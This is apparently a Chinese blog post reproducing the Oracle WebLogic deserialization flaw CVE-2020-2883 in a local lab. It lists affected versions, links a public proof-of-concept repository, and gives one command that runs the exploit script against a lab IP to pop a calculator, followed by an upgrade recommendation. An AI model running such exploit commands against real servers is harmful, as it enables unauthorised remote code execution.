影响版本

  • Oracle WebLogic Server 10.3.6.0.0
  • Oracle WebLogic Server 12.1.3.0.0
  • Oracle WebLogic Server 12.2.1.3.0
  • Oracle WebLogic Server 12.2.1.4.0

环境搭建

我这里使用得是12.1.3.0.0

CVE-2020-2883漏洞复现

选择第三个选项,其他默认

CVE-2020-2883漏洞复现

Your-IP:7001/console打开网站即可

CVE-2020-2883漏洞复现

Poc地址:https://github.com/zhzyker/exphub

py -2 cve-2020-2883_cmd.py -u http://192.168.111.131:7001/ -c calc

执行脚本,返回计算器

CVE-2020-2883漏洞复现

修复建议

升级到最新版

相关文章:

  • 2021-11-25
  • 2021-07-09
  • 2022-12-23
  • 2022-12-23
  • 2021-12-02
  • 2021-05-01
  • 2022-02-06
猜你喜欢
  • 2021-10-29
  • 2021-08-20
  • 2022-12-23
  • 2021-04-20
  • 2021-04-07
  • 2021-05-31
相关资源
相似解决方案